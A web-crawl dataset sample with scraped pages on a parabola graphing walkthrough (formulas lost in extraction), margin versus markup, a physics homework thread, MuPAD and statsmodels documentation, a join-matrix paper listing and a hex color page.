Dataset columns (with observed length ranges):

| Column | Type | Range |
| --- | --- | --- |
| URL | string | length 15 – 1.68k |
| text_list | list | 1 – 199 items |
| image_list | list | 1 – 199 items |
| metadata | string | length 1.19k – 3.08k |
https://istopdeath.com/graph-fxx-3x1/
[ "# Graph f(x)=(x-3)(x+1)", null, "Find the properties of the given parabola.\nRewrite the equation in vertex form.\nComplete the square for .\nExpand using the FOIL Method.\nApply the distributive property.\nApply the distributive property.\nApply the distributive property.\nSimplify and combine like terms.\nSimplify each term.\nMultiply by .\nMultiply by .\nMultiply by .\nSubtract from .\nUse the form , to find the values of , , and .\nConsider the vertex form of a parabola.\nSubstitute the values of and into the formula .\nSimplify the right side.\nCancel the common factor of .\nCancel the common factor.\nDivide by .\nMultiply by .\nFind the value of using the formula .\nSimplify each term.\nRaise to the power of .\nMultiply by .\nDivide by .\nMultiply by .\nSubtract from .\nSubstitute the values of , , and into the vertex form .\nSet equal to the new right side.\nUse the vertex form, , to determine the values of , , and .\nSince the value of is positive, the parabola opens up.\nOpens Up\nFind the vertex .\nFind , the distance from the vertex to the focus.\nFind the distance from the vertex to a focus of the parabola by using the following formula.\nSubstitute the value of into the formula.\nCancel the common factor of .\nCancel the common factor.\nRewrite the expression.\nFind the focus.\nThe focus of a parabola can be found by adding to the y-coordinate if the parabola opens up or down.\nSubstitute the known values of , , and into the formula and simplify.\nFind the axis of symmetry by finding the line that passes through the vertex and the focus.\nFind the directrix.\nThe directrix of a parabola is the horizontal line found by subtracting from the y-coordinate of the vertex if the parabola opens up or down.\nSubstitute the known values of and into the formula and simplify.\nUse the properties of the parabola to analyze and graph the parabola.\nDirection: Opens Up\nVertex:\nFocus:\nAxis of Symmetry:\nDirectrix:\nDirection: Opens Up\nVertex:\nFocus:\nAxis of Symmetry:\nDirectrix:\nSelect a few values, and plug them into the equation to find the corresponding values. The values should be selected around the vertex.\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nReplace the variable with in the expression.\nSimplify the result.\nSubtract from .\nMultiply by .\nThe final answer is .\nThe value at is .\nGraph the parabola using its properties and the selected points.\nGraph the parabola using its properties and the selected points.\nDirection: Opens Up\nVertex:\nFocus:\nAxis of Symmetry:\nDirectrix:\nGraph f(x)=(x-3)(x+1)", null, "", null, "", null, "## Download our App from the store\n\n### Create a High Performed UI/UX Design from a Silicon Valley.", null, "", null, "Scroll to top" ]
[ null, "https://istopdeath.com/wp-content/uploads/ask60.png", null, "https://www.istopdeath.com/polygon_03-1.png", null, "https://www.istopdeath.com/ellipse_02-1-1.png", null, "https://www.istopdeath.com/ellipse_01-1-1.png", null, "https://www.istopdeath.com/path-60-1.png", null, "https://www.istopdeath.com/1510-1.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84518635,"math_prob":0.9818685,"size":2862,"snap":"2022-40-2023-06","text_gpt3_token_len":654,"char_repetition_ratio":0.1623513,"word_repetition_ratio":0.4139265,"special_character_ratio":0.22396925,"punctuation_ratio":0.18461539,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998129,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-24T16:47:57Z\",\"WARC-Record-ID\":\"<urn:uuid:20e98496-7e24-47bf-8d11-6e3f93a66d79>\",\"Content-Length\":\"139110\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:244bdbb7-23c8-4064-9657-b9535cd94fd2>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d220b23-d7c4-414d-b70a-be08815be38a>\",\"WARC-IP-Address\":\"107.167.10.249\",\"WARC-Target-URI\":\"https://istopdeath.com/graph-fxx-3x1/\",\"WARC-Payload-Digest\":\"sha1:L5RNNZFIG3ZWZDLO777XNHVPKD7AB7HD\",\"WARC-Block-Digest\":\"sha1:RY7XML262P7FYSL6O2IIKF7TEMORQVMO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030331677.90_warc_CC-MAIN-20220924151538-20220924181538-00204.warc.gz\"}"}
https://www.finanshels.com/glossary/difference-between-margin-and-markup
[ "< Back to Glossary\n\n# Difference between margin and markup\n\nMargin and markup are two terms that are often used interchangeably, but they refer to slightly different concepts. Margin is the difference between the selling price of a good or service and the cost of producing it. It is calculated by dividing the difference by the selling price and expressing the result as a percentage. For example, if a company sells a product for \\$100 and it costs \\$75 to produce, the margin would be 25% (\\$25 / \\$100). Markup, on the other hand, is the amount added to the cost of a product to determine the selling price. It is calculated by dividing the difference between the selling price and the cost by the cost and expressing the result as a percentage. Using the same example as above, if a company sells a product for \\$100 and it costs \\$75 to produce, the markup would be 33.33% (\\$25 / \\$75). In summary, margin and markup are similar in that they both express the difference between the selling price and the cost of a product as a percentage. However, margin is calculated based on the selling price, while markup is calculated based on the cost.", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://assets-global.website-files.com/634fc8d084a32a7597b0bde8/6437b834549a69989a70fc83_Stop%20Playing%20with%20Your%20Finances-%20Download%20Our%20Ebook%20Now.webp", null, "https://assets-global.website-files.com/634fc8d084a32a7597b0bde8/642d6e3011520d7bfbeac608_stars-4.5.svg", null, "https://assets-global.website-files.com/634fc8d184a32a4d61b0be23/6423ce3708bd3fd1e22264b3_bader%20image.webp", null, "https://assets-global.website-files.com/634fc8d084a32a7597b0bde8/642d75b09571235307d6752a_online%20bookkeeping.webp", null, "https://assets-global.website-files.com/634fc8d184a32a4d61b0be23/642c036bcc98cf6aea5fe988_11.webp", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9727154,"math_prob":0.948354,"size":1081,"snap":"2023-40-2023-50","text_gpt3_token_len":229,"char_repetition_ratio":0.15413184,"word_repetition_ratio":0.2617801,"special_character_ratio":0.2358927,"punctuation_ratio":0.093457945,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9907096,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,9,null,9,null,9,null,9,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-08T03:57:50Z\",\"WARC-Record-ID\":\"<urn:uuid:5cc85308-d566-44f6-9374-ef6227970eff>\",\"Content-Length\":\"31895\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:faef45d1-7173-44e8-878d-e914dba47988>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ac23662-c4d5-418b-a79c-cdd3a28756b8>\",\"WARC-IP-Address\":\"34.234.52.18\",\"WARC-Target-URI\":\"https://www.finanshels.com/glossary/difference-between-margin-and-markup\",\"WARC-Payload-Digest\":\"sha1:PLLMUMDNWWS3TOXMGNWIGT54I2UQQ5DY\",\"WARC-Block-Digest\":\"sha1:BRLQSEOBABKNHSXSFQQRG3TST6XS2ZZH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100710.22_warc_CC-MAIN-20231208013411-20231208043411-00507.warc.gz\"}"}
https://www.physicsforums.com/threads/motion-in-curves-find-radial-and-circumferential-components-of-v-and-a.468350/
[ "# Motion in curves - Find radial and circumferential components of V and A\n\n## Homework Statement\n\nAt time t, a comet has the position R = (t2-1)i + 2tj\n\nAt t = 2, find the radial and circumferential components of velocity and acceleration\n\n## Homework Equations\n\nVr = V * Ur\nVθ = V * Uθ\n\nar = a * Ur\naθ = a * Uθ\n\nUr = cosθ i + sinθ j\nUθ = -sinθ i + cosθ j\n\n## The Attempt at a Solution\n\nI've found\n\nv = 2ti + 2j\na= 2i\n\nHowever, am I allowed to use these equations when the position vector is a function of t and not a function of θ? I'm not very good at polar coordinates so I'm really not sure if I can apply the above equations to my problem right away. Thanks\n\n## Answers and Replies\n\nlanedance\nHomework Helper\nso you've found the correct equations for v & a in caretseian coords, however now you must find their projection in the radial and theta directions\n\nYeah, but say I do Vr = V * Ur\n\nI would get\n\nVr = (2t i + 2 j) * (cosθ i + sinθ j)\nVr = 2tcosθ i + 2sinθ j\n\nIs that right? It strikes me as odd that the Vr I found has both θ and t in it.\n\nlanedance\nHomework Helper\nYeah, but say I do Vr = V * Ur\n\nI would get\n\nVr = (2t i + 2 j) * (cosθ i + sinθ j)\nVr = 2tcosθ i + 2sinθ j\n\nIs that right? It strikes me as odd that the Vr I found has both θ and t in it.\n\nif that is a dot product, then it should have a scalar result, not a vector\nVr = (2t i + 2 j) * (cosθ i + sinθ j) = 2tcosθ + 2sinθ\n\nAnd it should be a simple exercise to write theta in terms of t\n\nLast edited:\nSammyS\nStaff Emeritus\nScience Advisor\nHomework Helper\nGold Member\nYeah, but say I do Vr = V * Ur\n\nI would get\n\nVr = (2t i + 2 j) * (cosθ i + sinθ j)\nVr = 2tcosθ i + 2sinθ j\n\nIs that right? It strikes me as odd that the Vr I found has both θ and t in it.\nWhat sort of multiplication gives: (2t i + 2 j) * (cosθ i + sinθ j) = 2t*cosθ i + 2sinθ j ?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88292617,"math_prob":0.9807785,"size":584,"snap":"2021-21-2021-25","text_gpt3_token_len":193,"char_repetition_ratio":0.094827585,"word_repetition_ratio":0.0,"special_character_ratio":0.30650684,"punctuation_ratio":0.041666668,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9979938,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-25T05:08:50Z\",\"WARC-Record-ID\":\"<urn:uuid:b1bb86da-56d7-4f24-a9e9-999dd4344012>\",\"Content-Length\":\"71556\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7f5f9435-1c8a-4d31-a615-2115f64d3256>\",\"WARC-Concurrent-To\":\"<urn:uuid:00b24bbf-85a9-4043-9f95-499a06ce75bc>\",\"WARC-IP-Address\":\"172.67.68.135\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/motion-in-curves-find-radial-and-circumferential-components-of-v-and-a.468350/\",\"WARC-Payload-Digest\":\"sha1:L3LN63YIPCCXYGYD3CAZ3WHUKC3LPKWV\",\"WARC-Block-Digest\":\"sha1:5GGW7JXWP4F7SPMCIGYQRV6EDPNRDBE6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488567696.99_warc_CC-MAIN-20210625023840-20210625053840-00262.warc.gz\"}"}
https://kr.mathworks.com/help/symbolic/mupad_ref/not.html
[ "# `not`, `_not`\n\nLogical negation\n\nMuPAD® notebooks will be removed in a future release. Use MATLAB® live scripts instead.\n\nMATLAB live scripts support most MuPAD functionality, though there are some differences. For more information, see Convert MuPAD Notebooks to MATLAB Live Scripts.\n\n## Syntax\n\n```not b\n_not(`b`)\n```\n\n## Description\n\n`not b` represents the logical negation of the Boolean expression `b`.\n\nMuPAD® uses a three state logic with the Boolean constants `TRUE`, `FALSE`, and `UNKNOWN`. These are processed as follows:\n\n• `not TRUE = FALSE`\n\n• `not FALSE = TRUE`\n\n• `not UNKNOWN = UNKNOWN`\n\n`_not(b)` is equivalent to `not b`.\n\nBoolean expressions can be composed of these constants as well as of arbitrary arithmetical expressions. Typically, equations, such as `x = y`, and inequalities, such as ```x <> y```, `x < y`, and ```x <= y```, are used to construct Boolean expressions.\n\nCombinations of the constants `TRUE`, `FALSE`, `UNKNOWN` inside a Boolean expression are simplified automatically. However, symbolic Boolean subexpressions, equalities, and inequalities are not evaluated and simplified by logical operators. Use `bool` to evaluate such expressions to one of the Boolean constants. Note, however, that `bool` can evaluate inequalities ```x < y```, `x <= y` and so on only if they are composed of numbers of type `Type::Real`. See Example 2.\n\nUse `simplify` with the option `logic` to simplify expressions involving symbolic Boolean subexpressions. See Example 3.\n\nThe precedences of the logical operators are as follows. If in doubt, use brackets to make sure that the expression is parsed as desired.\n\n• The operator `not` is stronger binding than `and`, that is, `not b1 and b2` = ```(not b1) and b2```.\n\n• The operator `and` is stronger binding than `xor`, that is, `b1 and b2 or b3` = ```(b1 and b2) xor b3```.\n\n• The operator `xor` is stronger binding than `or`, that is, `b1 xor b2 or b3` = ```(b1 xor b2) or b3```.\n\n• The operator `or` is stronger binding than `==>`, that is, ```b1 or b2 ==> b3``` = `(b1 or b2) ==> b3`.\n\n• The operator `==>` is stronger binding than `<=>`, that is, ```b1 ==> b2 <=> b3``` = `(b1 ==> b2) <=> b3`.\n\nIn the conditional context of `if`, `repeat`, and `while` statements, Boolean expressions are evaluated via “lazy evaluation” (see `_lazy_and`, `_lazy_or`). In any other context, all operands are evaluated.\n\n## Examples\n\n### Example 1\n\nCombinations of the Boolean constants `TRUE`, `FALSE`, and `UNKNOWN` are simplified automatically to one of these constants:\n\n`TRUE and not (FALSE or TRUE)`\n`", null, "`\n`not UNKNOWN`\n`", null, "`\n\n### Example 2\n\nLogical operators simplify subexpressions that evaluate to the constants `TRUE`, `FALSE`, `UNKNOWN`.\n\n`b1 or b2 and (not FALSE)`\n`", null, "`\n`FALSE or ((not b1) and TRUE)`\n`", null, "`\n`b1 and (b2 or FALSE) and (not UNKNOWN)`\n`", null, "`\n\nHowever, equalities and inequalities are not evaluated:\n\n`not(x = x) and (1 < 2) and (2 < 3) and (3 > 4)`\n`", null, "`\n\nBoolean evaluation is enforced via `bool`:\n\n`bool(%)`\n`", null, "`\n\n### Example 3\n\nExpressions involving symbolic Boolean subexpressions are not simplified by `and`, `or`, `not`. Simplification has to be requested explicitly via the function `simplify`:\n\n`(b1 and b2) or (b1 and (not b2)) and (1 < 2)`\n`", null, "`\n`simplify(%, logic)`\n`", null, "`\n\n## Parameters\n\n `b` Boolean expressions\n\n## Return Values\n\nBoolean expression.\n\n`b`, `b_1`, `b_2`" ]
[ null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e772.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e784.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e801.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e805.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e809.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-1ab3abed.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-3d77f22e.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e865.png", null, "https://kr.mathworks.com/help/symbolic/mupad_ref/not-d0e869.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8152388,"math_prob":0.9845711,"size":2988,"snap":"2020-10-2020-16","text_gpt3_token_len":813,"char_repetition_ratio":0.14477211,"word_repetition_ratio":0.033333335,"special_character_ratio":0.26338688,"punctuation_ratio":0.14438502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9956561,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-21T22:57:49Z\",\"WARC-Record-ID\":\"<urn:uuid:550f034d-74d1-4d8a-bb9e-94366aa22e30>\",\"Content-Length\":\"75467\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c2075101-b113-4903-a1e0-748aa64053bd>\",\"WARC-Concurrent-To\":\"<urn:uuid:de2fddb0-fc72-4aec-9617-d6dc7d56fe18>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://kr.mathworks.com/help/symbolic/mupad_ref/not.html\",\"WARC-Payload-Digest\":\"sha1:KOIXFAHYSQQR7EFB6AIFW2T7SEJDYCK7\",\"WARC-Block-Digest\":\"sha1:ZIX2SCTKBCKEG6UHFGRGR5AYKPAUZ2KR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145538.32_warc_CC-MAIN-20200221203000-20200221233000-00558.warc.gz\"}"}
https://brilliant.org/practice/quadratic-equations-level-1-challenges/?subtopic=quadratic-equations&chapter=quadratic-equations
[ "", null, "Algebra\n\n# Quadratic Equations: Level 2 Challenges", null, "The image above illustrates which identity?\n\nWhen the square of a certain positive integer is reduced by 38, we get the value 83. What is the integer?\n\nSuppose that 6 is one of the roots of quadratic equation $x^2-2x+a=0$. What is the other root?\n\n\\begin{aligned} x(y+z)&=&39\\\\ y(x+z)&=&60\\\\ z(x+y)&=&63 \\\\ x^2+y^2+z^2&=& \\ ? \\end{aligned}\n\nSee Part 2 and Part 3.", null, "What are the solutions to the equation\n\n$x^2 = 4 ?$\n\n×" ]
[ null, "https://ds055uzetaobb.cloudfront.net/brioche/chapter/Quadratic%20Equations-Xy0bUj.png", null, "https://ds055uzetaobb.cloudfront.net/brioche/solvable/7ecb5d07f2.8d73250965.LtHry6.png", null, "https://ds055uzetaobb.cloudfront.net/brioche/solvable/cb654ac8f3.d873c5fa8a.PfNfph.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9288654,"math_prob":0.9999474,"size":611,"snap":"2020-45-2020-50","text_gpt3_token_len":140,"char_repetition_ratio":0.17133443,"word_repetition_ratio":0.29357797,"special_character_ratio":0.23240589,"punctuation_ratio":0.18248175,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999583,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,8,null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-22T23:31:44Z\",\"WARC-Record-ID\":\"<urn:uuid:d0938322-c85f-481b-9f52-6320dc540979>\",\"Content-Length\":\"90783\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:af7923b3-8821-4e79-84e1-54765d8b2fba>\",\"WARC-Concurrent-To\":\"<urn:uuid:bc460a29-13a2-4542-a297-9ac4b6838f7d>\",\"WARC-IP-Address\":\"104.20.34.242\",\"WARC-Target-URI\":\"https://brilliant.org/practice/quadratic-equations-level-1-challenges/?subtopic=quadratic-equations&chapter=quadratic-equations\",\"WARC-Payload-Digest\":\"sha1:XIMPW6UWUE7L2XFWQGLXPC5NPWWQIKGD\",\"WARC-Block-Digest\":\"sha1:I6PBLNOQ77WHM45VNIVEYK5TOPE74GKJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107880401.35_warc_CC-MAIN-20201022225046-20201023015046-00338.warc.gz\"}"}
https://www.statsmodels.org/stable/generated/statsmodels.regression.mixed_linear_model.MixedLMResults.html
[ "# statsmodels.regression.mixed_linear_model.MixedLMResults¶\n\nclass statsmodels.regression.mixed_linear_model.MixedLMResults(model, params, cov_params)[source]\n\nClass to contain results of fitting a linear mixed effects model.\n\nMixedLMResults inherits from statsmodels.LikelihoodModelResults\n\nParameters\nSee statsmodels.LikelihoodModelResults\n\nstatsmodels.LikelihoodModelResults\nAttributes\nmodelclass instance\n\nPointer to MixedLM model instance that called fit.\n\nnormalized_cov_paramsndarray\n\nSee specific model class docstring\n\nparamsndarray\n\nA packed parameter vector for the profile parameterization. The first k_fe elements are the estimated fixed effects coefficients. The remaining elements are the estimated variance parameters. The variance parameters are all divided by scale and are not the variance parameters shown in the summary.\n\nfe_paramsndarray\n\nThe fitted fixed-effects coefficients\n\ncov_rendarray\n\nThe fitted random-effects covariance matrix\n\nbse_fendarray\n\nThe standard errors of the fitted fixed effects coefficients\n\nbse_rendarray\n\nThe standard errors of the fitted random effects covariance matrix and variance components. The first k_re * (k_re + 1) parameters are the standard errors for the lower triangle of cov_re, the remaining elements are the standard errors for the variance components.\n\nMethods\n\n bootstrap([nrep, method, disp, store]) simple bootstrap to get mean and variance of estimator conf_int([alpha, cols]) Construct confidence interval for the fitted parameters. cov_params([r_matrix, column, scale, cov_p, …]) Compute the variance/covariance matrix. f_test(r_matrix[, cov_p, scale, invcov]) Compute the F-test for a joint linear hypothesis. get_nlfun(fun) This is not Implemented initialize(model, params, **kwargs) Initialize (possibly re-initialize) a Results instance. load(fname) Load a pickled results instance See specific model class docstring predict([exog, transform]) Call self.model.predict with self.params as the first argument. profile_re(re_ix, vtype[, num_low, …]) Profile-likelihood inference for variance parameters. Remove data arrays, all nobs arrays from result and model. save(fname[, remove_data]) Save a pickle of this instance. summary([yname, xname_fe, xname_re, title, …]) Summarize the mixed model regression results. t_test(r_matrix[, scale, use_t]) Compute a t-test for a each linear hypothesis of the form Rb = q t_test_pairwise(term_name[, method, alpha, …]) Perform pairwise t_test with multiple testing corrected p-values. wald_test(r_matrix[, cov_p, scale, invcov, …]) Compute a Wald-test for a joint linear hypothesis. wald_test_terms([skip_single, …]) Compute a sequence of Wald tests for terms over multiple columns.\n\nProperties\n\n aic Akaike information criterion bic Bayesian information criterion bse The standard errors of the parameter estimates. bse_fe Returns the standard errors of the fixed effect regression coefficients. bse_re Returns the standard errors of the variance parameters. bsejac standard deviation of parameter estimates based on covjac bsejhj standard deviation of parameter estimates based on covHJH covjac covariance of parameters based on outer product of jacobian of log-likelihood covjhj covariance of parameters based on HJJH df_modelwc Model WC fittedvalues Returns the fitted values for the model. hessv cached Hessian of log-likelihood llf pvalues The two-tailed p values for the t-stats of the params. random_effects The conditional means of random effects given the data. 
random_effects_cov Returns the conditional covariance matrix of the random effects for each group given the data. resid Returns the residuals for the model. score_obsv cached Jacobian of log-likelihood tvalues Return the t-statistic for a given parameter estimate. use_t Flag indicating to use the Student’s distribution in inference." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54055244,"math_prob":0.9371572,"size":3673,"snap":"2019-51-2020-05","text_gpt3_token_len":800,"char_repetition_ratio":0.13845734,"word_repetition_ratio":0.061181433,"special_character_ratio":0.19003539,"punctuation_ratio":0.13471502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99326766,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-27T10:45:28Z\",\"WARC-Record-ID\":\"<urn:uuid:2facb7e2-e305-4019-807e-386619f589c5>\",\"Content-Length\":\"40885\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3113b926-778d-4049-8b92-1e119dd8198c>\",\"WARC-Concurrent-To\":\"<urn:uuid:38daa27e-ad00-4e82-89dc-d1a0adf24b30>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"https://www.statsmodels.org/stable/generated/statsmodels.regression.mixed_linear_model.MixedLMResults.html\",\"WARC-Payload-Digest\":\"sha1:H2HKLN66OXVAHKCBVAPJ5YUY6WQHRR7Q\",\"WARC-Block-Digest\":\"sha1:KR36SWFJ75QSDVMNR3GJN2KPLNXZL4CT\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251696046.73_warc_CC-MAIN-20200127081933-20200127111933-00319.warc.gz\"}"}
http://science.landoffree.com/paper/determinant-and-inverse-of-join-matrices-on-two-sets
[ "# Determinant and inverse of join matrices on two sets\n\nMathematics – Number Theory\n\nScientific paper\n\n[ 0.00 ] – not rated yet Voters 0   Comments 0\n\n## Details Determinant and inverse of join matrices on two sets Determinant and inverse of join matrices on two sets\n\nScientific paper\n\nLet \\$(P,\\preceq)\\$ be a lattice and \\$f\\$ a complex-valued function on \\$P\\$. We define meet and join matrices on two arbitrary subsets \\$X\\$ and \\$Y\\$ of \\$P\\$ by \\$(X,Y)_f=(f(x_i\\wedge y_j))\\$ and \\$[X,Y]_f=(f(x_i\\vee x_j))\\$ respectively. Here we present expressions for the determinant and the inverse of \\$[X,Y]_f\\$. Our main goal is to cover the case when \\$f\\$ is not semimultiplicative since the formulas presented earlier for \\$[X,Y]_f\\$ cannot be applied in this situation. In cases when \\$f\\$ is semimultiplicative we obtain several new and known formulas for the determinant and inverse of \\$(X,Y)_f\\$ and the usual meet and join matrices \\$(S)_f\\$ and \\$[S]_f\\$. We also apply these formulas to LCM, MAX, GCD and MIN matrices, which are special cases of join and meet matrices.\n\nNo associations\n\nLandOfFree\n\n## Say what you really think\n\nSearch LandOfFree.com for scientists and scientific papers. Rate them and share your experience with other people.\n\n## Rating\n\nDeterminant and inverse of join matrices on two sets does not yet have a rating. At this time, there are no reviews or comments for this scientific paper.\n\nIf you have personal experience with Determinant and inverse of join matrices on two sets, we encourage you to share that experience with our LandOfFree.com community. Your opinion is very important and Determinant and inverse of join matrices on two sets will most certainly appreciate the feedback.\n\nProfile ID: LFWR-SCP-O-564634\n\nAll data on this website is collected from public sources. Our data reflects the most accurate information available at the time of publication." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88147426,"math_prob":0.9346663,"size":1403,"snap":"2021-04-2021-17","text_gpt3_token_len":363,"char_repetition_ratio":0.13223732,"word_repetition_ratio":0.06481481,"special_character_ratio":0.23734854,"punctuation_ratio":0.0858209,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9641148,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-19T19:55:02Z\",\"WARC-Record-ID\":\"<urn:uuid:4f9e1feb-037e-46c4-b06f-e07381939577>\",\"Content-Length\":\"38470\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:277e7654-e77e-4687-8a38-561c41a4ca9d>\",\"WARC-Concurrent-To\":\"<urn:uuid:9245c982-60d1-4f4b-9cb4-2ce47c96d82c>\",\"WARC-IP-Address\":\"5.9.30.72\",\"WARC-Target-URI\":\"http://science.landoffree.com/paper/determinant-and-inverse-of-join-matrices-on-two-sets\",\"WARC-Payload-Digest\":\"sha1:GXYAFAMDVZJZEES2SVS3IHUFXLG6AOHH\",\"WARC-Block-Digest\":\"sha1:SRMLI744PPSZ2QALAO6T462XKRRQVMAL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038916163.70_warc_CC-MAIN-20210419173508-20210419203508-00123.warc.gz\"}"}
https://www.colorhexa.com/3d4249
[ "# #3d4249 Color Information\n\nIn a RGB color space, hex #3d4249 is composed of 23.9% red, 25.9% green and 28.6% blue. Whereas in a CMYK color space, it is composed of 16.4% cyan, 9.6% magenta, 0% yellow and 71.4% black. It has a hue angle of 215 degrees, a saturation of 9% and a lightness of 26.3%. #3d4249 color hex could be obtained by blending #7a8492 with #000000. Closest websafe color is: #333333.\n\n• R 24\n• G 26\n• B 29\nRGB color chart\n• C 16\n• M 10\n• Y 0\n• K 71\nCMYK color chart\n\n#3d4249 color description : Very dark grayish blue.\n\n# #3d4249 Color Conversion\n\nThe hexadecimal color #3d4249 has RGB values of R:61, G:66, B:73 and CMYK values of C:0.16, M:0.1, Y:0, K:0.71. Its decimal value is 4014665.\n\nHex triplet RGB Decimal 3d4249 `#3d4249` 61, 66, 73 `rgb(61,66,73)` 23.9, 25.9, 28.6 `rgb(23.9%,25.9%,28.6%)` 16, 10, 0, 71 215°, 9, 26.3 `hsl(215,9%,26.3%)` 215°, 16.4, 28.6 333333 `#333333`\nCIE-LAB 27.763, -0.352, -4.941 5.075, 5.37, 7.072 0.29, 0.307, 5.37 27.763, 4.954, 265.926 27.763, -2.824, -5.772 23.172, -1.457, -1.874 00111101, 01000010, 01001001\n\n# Color Schemes with #3d4249\n\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #49443d\n``#49443d` `rgb(73,68,61)``\nComplementary Color\n• #3d4849\n``#3d4849` `rgb(61,72,73)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #3e3d49\n``#3e3d49` `rgb(62,61,73)``\nAnalogous Color\n• #48493d\n``#48493d` `rgb(72,73,61)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #493e3d\n``#493e3d` `rgb(73,62,61)``\nSplit Complementary Color\n• #42493d\n``#42493d` `rgb(66,73,61)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #493d42\n``#493d42` `rgb(73,61,66)``\n• #3d4944\n``#3d4944` `rgb(61,73,68)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #493d42\n``#493d42` `rgb(73,61,66)``\n• #49443d\n``#49443d` `rgb(73,68,61)``\n• #1a1c1f\n``#1a1c1f` `rgb(26,28,31)``\n• #26292d\n``#26292d` `rgb(38,41,45)``\n• #31353b\n``#31353b` `rgb(49,53,59)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #494f57\n``#494f57` `rgb(73,79,87)``\n• #545b65\n``#545b65` `rgb(84,91,101)``\n• #606873\n``#606873` `rgb(96,104,115)``\nMonochromatic Color\n\n# Alternatives to 